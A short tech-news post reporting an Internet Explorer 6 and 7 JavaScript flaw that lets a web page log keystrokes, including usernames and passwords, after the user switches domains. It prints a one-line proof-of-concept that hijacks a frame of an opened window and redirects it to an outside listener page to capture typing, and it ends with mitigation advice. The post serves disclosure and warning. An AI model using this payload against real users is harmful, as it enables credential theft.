Ghacks has found a critical Javascript vulnerability that effects Internet Explorer 6&7, that can be used to record keystrokes of a user even if he is switching domains. That means that a specifically prepared website can launch some Javascript that records everything the user does afterwards including text input which naturally means usernames and passwords as well.
The following Javascript code, when clicked will open a new window (hackademix.net), it will hijack one of the iframes, and capture keystrokes.
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);
There is no fix for this vulnerability at this moment, if you’re using IE 6, IE7, all you can do is disable Javascript or allow it only on trusted domains. There is an explanation from the same researcher available.
Source:→ Ghacks
Recommend this story
Email Newsletter
Missing out on the latest diTii.com news? Enter your email below to receive future announcements direct to your inbox. An email confirmation will be sent before your subscription is activated - please check your spam folder if you don't receive this.
About the AuthorDG